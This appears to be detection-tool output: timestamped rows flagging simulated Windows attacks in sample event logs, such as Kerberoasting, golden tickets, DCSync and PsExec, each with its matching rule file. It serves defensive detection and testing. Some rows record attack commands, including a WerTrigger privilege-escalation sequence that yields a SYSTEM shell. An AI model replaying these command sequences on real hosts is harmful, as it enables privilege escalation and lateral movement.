2020-08-02 20:37:55.483 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN  :  Service: ROOTDC1$  :  IP Address: ::ffff:10.23.42.22  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:37:55.484 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN  :  Service: krbtgt  :  IP Address: ::ffff:10.23.42.22  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:37:55.625 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN  :  Service: ROOTDC1$  :  IP Address: ::ffff:10.23.42.22  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 21:02:34.103 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 55731  :  LogonID: 0x11b8c41e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:02:35.117 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 55731  :  LogonID: 0x11b8c703,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:02:37.166 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 55733  :  LogonID: 0x11b8c741,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:03:03.560 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ROOTDC1$  :  Workstation: -  :  IP Address: fe80::1cae:5aa4:9d8d:106a  :  Port: 58736  :  LogonID: 0x11b8cd00,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:03:08.715 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: FS02$  :  Workstation: -  :  IP Address: 10.23.42.18  :  Port: 62274  :  LogonID: 0x11b8d014,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:03:12.993 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 55738  :  LogonID: 0x11b8d057,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:04:02.850 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 55748  :  LogonID: 0x11b8dcc1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:04:09.689 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 54927  :  LogonID: 0x11b9e9a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:04:09.695 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 54931  :  LogonID: 0x11b9e9c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 54933  :  LogonID: 0x11b9e9d3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 54932  :  LogonID: 0x11b9e9e5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:04:09.816 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 55750  :  LogonID: 0x11b9ea1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:26:03.702 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan  :  Service: ROOTDC2$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:26:11.437 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan  :  Service: ROOTDC2$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:26:20.424 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan  :  Service: ROOTDC1$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:27:02.387 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan  :  Service: ROOTDC1$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:27:19.056 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN  :  Service: ROOTDC1$  :  IP Address: ::1  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:27:19.742 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN  :  Service: ROOTDC1$  :  IP Address: ::1  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:31:20.566 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan  :  Service: ROOTDC1$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:31:20.567 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan  :  Service: krbtgt  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:31:20.925 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan  :  Service: FS02$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:31:20.926 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan  :  Service: MSSQL01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-03 01:24:07.551 +09:00,MSEDGEWIN10,7,high,Fax Service DLL Search Order Hijack,,rules/sigma/image_load/sysmon_susp_fax_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:07.558 +09:00,MSEDGEWIN10,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_NetSvc_SessionToken_Retrival_via_localSMB_Auth_5145.evtx
2020-08-03 01:24:26.809 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""c:\windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-12 22:05:20.029 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat""""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:05:36.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:05:38.260 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c reg query ""HKLM\Software\WOW6432Node\Npcap"" /ve 2>nul | find ""REG_SZ""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat""""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:05:45.570 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: WerTrigger.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:01.637 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: WerTrigger.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: WerTrigger.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c schtasks /run /TN ""Microsoft\Windows\Windows Error Reporting\QueueReporting"" > nul 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: WerTrigger.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:04.075 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\wermgr.exe -upload",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-21 00:35:28.503 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: hack-admu-test1  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:36:32.382 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:36:32.391 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:37:06.186 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:37:14.331 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:37:17.039 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:37:35.319 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:37:35.773 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: JUMP01$  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:38:23.185 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: not_existing_user  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx
2020-08-21 00:39:15.820 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx
2020-08-21 00:41:58.884 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: not_existing_user  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 50329  :  LogonID: 0x119b90e2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 50329  :  LogonID: 0x119b9a72,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 50380  :  LogonID: 0x119b9a8f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 50381  :  LogonID: 0x119b9aa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 50382  :  LogonID: 0x119b9ab2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:42:55.188 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 50317  :  LogonID: 0x119b9b27,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:43:04.967 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 50329  :  LogonID: 0x119b9e04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 50380  :  LogonID: 0x119ba401,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 50381  :  LogonID: 0x119ba414,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 50382  :  LogonID: 0x119ba427,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-27 20:40:56.397 +09:00,04246w-win10.threebeesco.com,11,low,PsExec Tool Execution,,rules/sigma/file_event/file_event_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,informational,Process Creation,Command: C:\WINDOWS\PSEXESVC.exe  :  Path: C:\Windows\PSEXESVC.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\WINDOWS\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
